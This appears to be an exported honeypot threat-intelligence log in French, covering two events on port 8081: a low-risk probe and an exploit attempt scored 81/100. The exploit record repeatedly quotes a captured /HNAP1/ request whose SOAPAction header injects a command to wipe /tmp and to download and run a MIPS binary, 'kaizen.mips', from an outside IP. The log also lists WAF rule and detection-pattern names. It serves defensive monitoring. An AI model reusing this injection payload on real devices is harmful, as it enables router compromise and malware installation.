"emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b",
"emulator_response_len": 82,
"port_inferred_service": true,
"bytes_in": 0,
"payload_entropy": 0,
"port_category": "registered",
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"service": "http-alt-8081",
"app_proto": "http-alt-8081",
"asn": 37963,
"country": "CN",
"dst_port": 8081,
"risk_waf": 8,
"risk_classification": 0,
"risk_behavior": 0,
"risk_geo": 0,
"risk_protocol": 22,
"risk_novelty": 0,
"risk_boost": 0,
"risk_granularity": 3.4,
"risk_breakdown": {
"waf": 8,
"classification": 0,
"behavior": 0,
"geo": 0,
"protocol": 22,
"novelty": 0
},
"risk_score": 0,
"tag_count": 0,
"anomaly_count": 0,
"campaign_key": "d64dc0c930338d642f642e22846c64f959ad84a2",
"event_fingerprint": "1023f61ccc055c445b71c912dbddfda91b08657e",
"classification_reason": "Type \u00ab http-alt-8081 \u00bb (signaux protocolaires) \u00b7 confiance 0%",
"confidence": 0.08,
"classification_confidence": 0.08,
"precision_score": 0,
"precision_signals": [],
"kb_rule_ids": [],
"confidence_breakdown": {
"waf": 8,
"classification": 0,
"behavior": 0,
"geo": 0,
"protocol": 22,
"novelty": 0,
"risk_score": 0,
"correlation_boost": 8
},
"named_classification_skipped": false,
"service_name": "http-alt-8081",
"risk_confidence_factor": 0,
"city": null,
"is_datacenter": false,
"is_tor_hint": false,
"geo": {
"country": "CN",
"asn": 37963,
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"is_datacenter": false,
"is_tor_hint": false
},
"fingerprint": {
"path_pattern_hash": "721fec86c34b7fdcb2df85c882e6db0e"
},
"target_context": {
"dst_port": 8081,
"service": "http-alt-8081",
"service_name": "http-alt-8081",
"risk_score": 0
},
"attack_stage": "probe",
"mitre_tactics": [
"TA0007",
"TA0001"
],
"mitre": "TA0007",
"threat_family": [
"unknown"
],
"recommended_client_action": "monitor",
"policy_mode": "intelligence",
"sensor_role": "threat_intelligence",
"event_signature": "5a23a81b3543b077eb32d0270ad7852c08db0e8d",
"protocol_details": {
"port": 8081,
"service": "http-alt-8081",
"service_label_fr": "HTTP ALT 8081"
},
"attack_vector": "http-alt-8081 \u00b7 via HTTP ALT 8081:8081 \u00b7 (sonde \/ probe)",
"target_port_label": "8081 \u00b7 HTTP ALT 8081",
"emulator_service": "http-alt-8081",
"confidence_reason": "Confiance faible (0 %) \u2014 classification prudente",
"site_display": {
"classification": null,
"classification_reason": "Type \u00ab http-alt-8081 \u00bb (signaux protocolaires) \u00b7 confiance 0%",
"classification_reason_label_fr": "Type \u00ab http-alt-8081 \u00bb (signaux protocolaires) \u00b7 confiance 0%",
"executive_one_liner_fr": "Activit\u00e9 suspecte",
"confidence_pct": 8,
"confidence_breakdown": {
"waf": 8,
"classification": 0,
"behavior": 0,
"geo": 0,
"protocol": 22,
"novelty": 0,
"risk_score": 0,
"correlation_boost": 8
},
"attack_stage": "probe",
"attack_stage_label": "Sonde \/ probe",
"attack_chain_stage": "discovery",
"attack_chain_stage_label_fr": "D\u00e9couverte",
"risk_score": 0,
"risk_label": "Faible",
"service_name": "http-alt-8081",
"service_label_fr": "HTTP ALT 8081",
"dst_port": 8081,
"protocol_emulated": true,
"tags_summary": null,
"tags_summary_labels_fr": null,
"recommended_action": "monitor",
"recommended_action_label": "Surveiller",
"mitre": "TA0007",
"mitre_technique": "TA0007",
"persona_hostname": "mail.sensor-1.internal",
"persona_service_banner": "honeypot-http-alt-8081",
"correlation_flags": [
"multi_protocol_correlation"
],
"correlation_flags_labels_fr": [
"Multi-protocole corr\u00e9l\u00e9 (5 min)"
],
"sensor_role": "threat_intelligence",
"sensor_role_label_fr": "Renseignement menaces",
"confidence_hint_fr": "Corr\u00e9lation +8",
"protocol_details": {
"port": 8081,
"service": "http-alt-8081",
"service_label_fr": "HTTP ALT 8081"
},
"attack_vector": "http-alt-8081 \u00b7 via HTTP ALT 8081:8081 \u00b7 (sonde \/ probe)",
"evidence_snippet": null,
"target_port_label": "8081 \u00b7 HTTP ALT 8081",
"emulator_service": "http-alt-8081",
"confidence_reason": "Confiance faible (0 %) \u2014 classification prudente",
"confidence_factors_fr": "Confiance 8 % \u2014 Score WAF 8 \u00b7 Bonus corr\u00e9lation +8",
"campaign_hint_fr": null,
"attack_phases_timeline_fr": [
{
"key": "recon",
"label_fr": "Reconnaissance",
"active": false,
"kind": "stage"
},
{
"key": "probe",
"label_fr": "Sonde \/ probe",
"active": true,
"kind": "stage"
},
{
"key": "exploit_attempt",
"label_fr": "Tentative d'exploit",
"active": false,
"kind": "stage"
},
{
"key": "post_exploit",
"label_fr": "Post-exploitation",
"active": false,
"kind": "stage"
},
{
"key": "c2",
"label_fr": "Commande & contr\u00f4le",
"active": false,
"kind": "stage"
},
{
"key": "discovery",
"label_fr": "D\u00e9couverte",
"active": true,
"kind": "chain",
"hint_fr": null
}
]
},
"honeypot_persona": {
"sensor_id": "sensor-1",
"hostname": "mail.sensor-1.internal",
"mail_host": "mail.sensor-1.internal",
"ldap_dc": "dc.sensor-1.internal",
"k8s_cluster": "hp-sensor-1",
"domain": "sensor-1.internal",
"service_role": "http_alt_8081",
"service_banner": "honeypot-http-alt-8081",
"service_os": "linux",
"dst_port": "8081"
},
"hostname": "mail.sensor-1.internal",
"sensor_id": "sensor-1",
"multi_protocol_correlation": true,
"multi_protocol_count": 2,
"multi_protocol_sample": [
"http",
"http-alt-8081"
],
"multi_protocol_window_s": 300,
"behavior_alerts": [
"multi_protocol_correlation"
],
"correlation_confidence_boost": 8,
"attack_chain_stage": "discovery",
"matched_patterns": [],
"ban_policy": "advisory_monitor"
}
|
|
|
TCP |
8081 · HTTP
|
http
|
SSRF
ssrf attack · via HTTP:8081 · (tentative d'exploit) · → /HNAP1/
|
Élevée
|
Élevé · 81
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1090
TA0001
TA0002
Protocole
POST /HNAP1/
Émulateur
HTTP
WAF
61
Recommandation
Investiguer
Tags
950079:sqli-19
950326:rce-0
950327:rce-0
950334:rce-2
Cible HTTP
POST
/HNAP1/
TLS SNI
—
Capteur
paris-1
|
Méthode
POST
Port
8081
Chemin / cible
/HNAP1/
Pourquoi cette classification : Règle WAF « ssrf-3 » · Motif SSRF · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — 10 tag(s) WAF
Protocole émulé
1
Signaux
Http Ssrf
Upstream
Waf Score
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932200
CRS 932205
LFI Double-dot bypass
Probe /HNAP1/
Ligne de requête
POST /HNAP1/ HTTP/1.1
User-Agent
—
Règles WAF
sqli-19
rce-0
rce-2
ssrf-3
nosqli-3
sap-sapcontrol-headers
Payload (extrait)
POST /HNAP1/ HTTP/1.0
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * &
Requête brute (extrait)
POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://176.65.149.168/bins/kaizen.mips && chmod +x kaizen.mips;./kaizen.mips` Content-Length: 537 <?xml version="1.0"
Meta JSON brut
{
"protocol_emulated": true,
"emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b",
"emulator_response_len": 82,
"http_header_count": 3,
"http_query_params": 0,
"http_path_depth": 1,
"http_path_ext": null,
"http_ua_hash": null,
"http_host_hash": null,
"http_target_hash": "02d390933aff357eb7a5799ee5ee152972259c4b",
"http_referer_hash": null,
"http_method": "POST",
"http_ua_is_cli": false,
"http_ua_is_browser": false,
"bytes_in": 772,
"payload_entropy": 5.3909128482196165,
"port_category": "registered",
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"service": "http",
"app_proto": "http",
"asn": 37963,
"country": "CN",
"dst_port": 8081,
"risk_waf": 100,
"risk_classification": 84,
"risk_behavior": 0,
"risk_geo": 0,
"risk_protocol": 43,
"risk_novelty": 25,
"risk_boost": 15,
"risk_granularity": 6.4,
"risk_breakdown": {
"waf": 100,
"classification": 84,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 25
},
"risk_score": 81,
"tag_count": 17,
"anomaly_count": 0,
"campaign_key": "db6b5026b82cd69abd89851ceb96e2e4b8ff7c73",
"event_fingerprint": "cf047675fa664837e4dd28d68e2d50ae57b8084f",
"classification_reason": "R\u00e8gle WAF \u00ab ssrf-3 \u00bb \u00b7 Motif SSRF \u00b7 confiance 100%",
"confidence": 1,
"classification_confidence": 1,
"precision_score": 110,
"precision_signals": [
"INT-http_ssrf",
"INT-upstream",
"INT-waf-score"
],
"kb_rule_ids": [
"INT-http_ssrf",
"INT-upstream",
"INT-waf-score"
],
"matched_patterns": [
"pat-0842",
"pat-0773",
"pat-0145",
"pat-0146",
"pat-0103",
"pat-0231"
],
"matched_pattern_names": [
"CRS 921130 duplicate CL",
"CRS 932100 cmd exec",
"CRS 932200",
"CRS 932205",
"LFI Double-dot bypass",
"Probe \/HNAP1\/"
],
"pattern_ids": [
"pat-0842",
"pat-0773",
"pat-0145",
"pat-0146",
"pat-0103",
"pat-0231"
],
"confidence_breakdown": {
"waf": 100,
"classification": 84,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 25,
"risk_score": 81
},
"named_classification_skipped": false,
"service_name": "http",
"risk_confidence_factor": 100,
"city": null,
"is_datacenter": false,
"is_tor_hint": false,
"geo": {
"country": "CN",
"asn": 37963,
"org": "Hangzhou Alibaba Advertising Co.,Ltd.",
"is_datacenter": false,
"is_tor_hint": false
},
"fingerprint": {
"payload_hash": "a7ba5e95e0d4628d3fc42ccce6a58c0e",
"path_pattern_hash": "5dfe7cbd38e86cb37175c751115b1f78"
},
"target_context": {
"dst_port": 8081,
"service": "http",
"service_name": "http",
"risk_score": 81
},
"payload_preview": "POST \/HNAP1\/ HTTP\/1.0\r\nContent-Type: text\/xml; charset=\"utf-8\"\r\nSOAPAction: http:\/\/purenetworks.com\/HNAP1\/`cd \/tmp && rm -rf * &",
"method": "POST",
"path": "\/HNAP1\/",
"waf_tags": [
"950079:sqli-19",
"950326:rce-0",
"950327:rce-0",
"950334:rce-2",
"950406:ssrf-3",
"950407:ssrf-3",
"950468:nosqli-3",
"950470:nosqli-3",
"950471:nosqli-3",
"950755:sap-sapcontrol-headers"
],
"waf_rule_names": [
"sqli-19",
"rce-0",
"rce-2",
"ssrf-3",
"nosqli-3",
"sap-sapcontrol-headers"
],
"request_line": "POST \/HNAP1\/ HTTP\/1.1",
"request_sample": "POST \/HNAP1\/ HTTP\/1.0\r\nContent-Type: text\/xml; charset=\"utf-8\"\r\nSOAPAction: http:\/\/purenetworks.com\/HNAP1\/`cd \/tmp && rm -rf * && wget http:\/\/176.65.149.168\/bins\/kaizen.mips && chmod +x kaizen.mips;.\/kaizen.mips`\r\nContent-Length: 537\r\n\r\n<?xml version=\"1.0\"",
"payload_snippet": "POST \/HNAP1\/ HTTP\/1.0\r\nContent-Type: text\/xml; charset=\"utf-8\"\r\nSOAPAction: http:\/\/purenetworks.com\/HNAP1\/`cd \/tmp && rm -rf * &",
"evidence": {
"method": "POST",
"path": "\/HNAP1\/",
"waf_tags": [
"950079:sqli-19",
"950326:rce-0",
"950327:rce-0",
"950334:rce-2",
"950406:ssrf-3",
"950407:ssrf-3",
"950468:nosqli-3",
"950470:nosqli-3",
"950471:nosqli-3",
"950755:sap-sapcontrol-headers"
],
"waf_rule_names": [
"sqli-19",
"rce-0",
"rce-2",
"ssrf-3",
"nosqli-3",
"sap-sapcontrol-headers"
],
"request_line": "POST \/HNAP1\/ HTTP\/1.1",
"request_sample": "POST \/HNAP1\/ HTTP\/1.0\r\nContent-Type: text\/xml; charset=\"utf-8\"\r\nSOAPAction: http:\/\/purenetworks.com\/HNAP1\/`cd \/tmp && rm -rf * && wget http:\/\/176.65.149.168\/bins\/kaizen.mips && chmod +x kaizen.mips;.\/kaizen.mips`\r\nContent-Length: 537\r\n\r\n<?xml version=\"1.0\"",
"payload_snippet": "POST \/HNAP1\/ HTTP\/1.0\r\nContent-Type: text\/xml; charset=\"utf-8\"\r\nSOAPAction: http:\/\/purenetworks.com\/HNAP1\/`cd \/tmp && rm -rf * &",
"classification_reason": "R\u00e8gle WAF \u00ab ssrf-3 \u00bb \u00b7 Motif SSRF \u00b7 confiance 100%"
},
"attack_stage": "exploit_attempt",
"mitre_tactics": [
"TA0001",
"TA0002"
],
"mitre_techniques": [
"T1090"
],
"mitre": "T1090",
"threat_family": [
"ssrf_probe"
],
"recommended_client_action": "investigate",
"policy_mode": "intelligence",
"sensor_role": "threat_intelligence",
"event_signature": "e5565438136e94d235a4f58d63aacd2cf3b80b5c",
"protocol_details": {
"http_method": "POST",
"http_path": "\/HNAP1\/",
"request_line": "POST \/HNAP1\/ HTTP\/1.1",
"port": 8081,
"service": "http",
"service_label_fr": "HTTP"
},
"evidence_snippet": "POST \/HNAP1\/ HTTP\/1.0\r\nContent-Type: text\/xml; charset=\"utf-8\"\r\nSOAPAction: http:\/\/purenetworks.com\/HNAP1\/`cd \/tmp && rm -rf * &",
"attack_vector": "ssrf attack \u00b7 via HTTP:8081 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/HNAP1\/",
"target_port_label": "8081 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 100 % \u2014 10 tag(s) WAF",
"site_display": {
"classification": null,
"classification_reason": "R\u00e8gle WAF \u00ab ssrf-3 \u00bb \u00b7 Motif SSRF \u00b7 confiance 100%",
"classification_reason_label_fr": "R\u00e8gle WAF \u00ab ssrf-3 \u00bb \u00b7 Motif SSRF \u00b7 confiance 100%",
"executive_one_liner_fr": "Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1090 \u2014 confiance 100 % \u2014 via HTTP",
"confidence_pct": 100,
"confidence_breakdown": {
"waf": 100,
"classification": 84,
"behavior": 0,
"geo": 0,
"protocol": 43,
"novelty": 25,
"risk_score": 81
},
"attack_stage": "exploit_attempt",
"attack_stage_label": "Tentative d'exploit",
"attack_chain_stage": "exploitation",
"attack_chain_stage_label_fr": "Exploitation",
"risk_score": 81,
"risk_label": "\u00c9lev\u00e9",
"service_name": "http",
"service_label_fr": "HTTP",
"dst_port": 8081,
"protocol_emulated": true,
"tags_summary": [
"INT-http_ssrf",
"INT-upstream",
"INT-waf-score"
],
"tags_summary_labels_fr": [
"Http Ssrf",
"Upstream",
"Waf Score"
],
"recommended_action": "investigate",
"recommended_action_label": "Investiguer",
"mitre": "T1090",
"mitre_technique": "T1090",
"persona_hostname": "mail.sensor-1.internal",
"persona_service_banner": "honeypot-http",
"correlation_flags": null,
"correlation_flags_labels_fr": null,
"sensor_role": "threat_intelligence",
"sensor_role_label_fr": "Renseignement menaces",
"confidence_hint_fr": null,
"protocol_details": {
"http_method": "POST",
"http_path": "\/HNAP1\/",
"request_line": "POST \/HNAP1\/ HTTP\/1.1",
"port": 8081,
"service": "http",
"service_label_fr": "HTTP"
},
"attack_vector": "ssrf attack \u00b7 via HTTP:8081 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/HNAP1\/",
"evidence_snippet": "POST \/HNAP1\/ HTTP\/1.0\r\nContent-Type: text\/xml; charset=\"utf-8\"\r\nSOAPAction: http:\/\/purenetworks.com\/HNAP1\/`cd \/tmp && rm -rf * &",
"target_port_label": "8081 \u00b7 HTTP",
"emulator_service": "http",
"confidence_reason": "Confiance 100 % \u2014 10 tag(s) WAF",
"confidence_factors_fr": "Confiance 100 % \u2014 Score WAF 100 \u00b7 10 tag(s) WAF",
"campaign_hint_fr": null,
"attack_phases_timeline_fr": [
{
"key": "recon",
"label_fr": "Reconnaissance",
"active": false,
"kind": "stage"
},
{
"key": "probe",
"label_fr": "Sonde \/ probe",
"active": false,
"kind": "stage"
},
{
"key": "exploit_attempt",
"label_fr": "Tentative d'exploit",
"active": true,
"kind": "stage"
},
{
"key": "post_exploit",
"label_fr": "Post-exploitation",
"active": false,
"kind": "stage"
},
{
"key": "c2",
"label_fr": "Commande & contr\u00f4le",
"active": false,
"kind": "stage"
},
{
"key": "exploitation",
"label_fr": "Exploitation",
"active": true,
"kind": "chain",
"hint_fr": null
}
]
},
"honeypot_persona": {
"sensor_id": "sensor-1",
"hostname": "mail.sensor-1.internal",
"mail_host": "mail.sensor-1.internal",
"ldap_dc": "dc.sensor-1.internal",
"k8s_cluster": "hp-sensor-1",
"domain": "sensor-1.internal",
"service_role": "http",
"service_banner": "honeypot-http",
"service_os": "linux",
"dst_port": "8081"
},
"hostname": "mail.sensor-1.internal",
"sensor_id": "sensor-1",
"attack_chain_stage": "exploitation",
"ban_policy": "advisory_investigate",
"tags_list": [
"950079:sqli-19",
"950326:rce-0",
"950327:rce-0",
"950334:rce-2",
"950406:ssrf-3",
"950407:ssrf-3",
"950468:nosqli-3",
"950470:nosqli-3",
"950471:nosqli-3",
"950755:sap-sapcontrol-headers",
"http_contenttype_attack_surface",
"http_jwt_body",
"http_no_ua",
"http_ssrf_body",
"iot_hnap_soap",
"iot_http_endpoint",
"net_web_probe"
]
}
|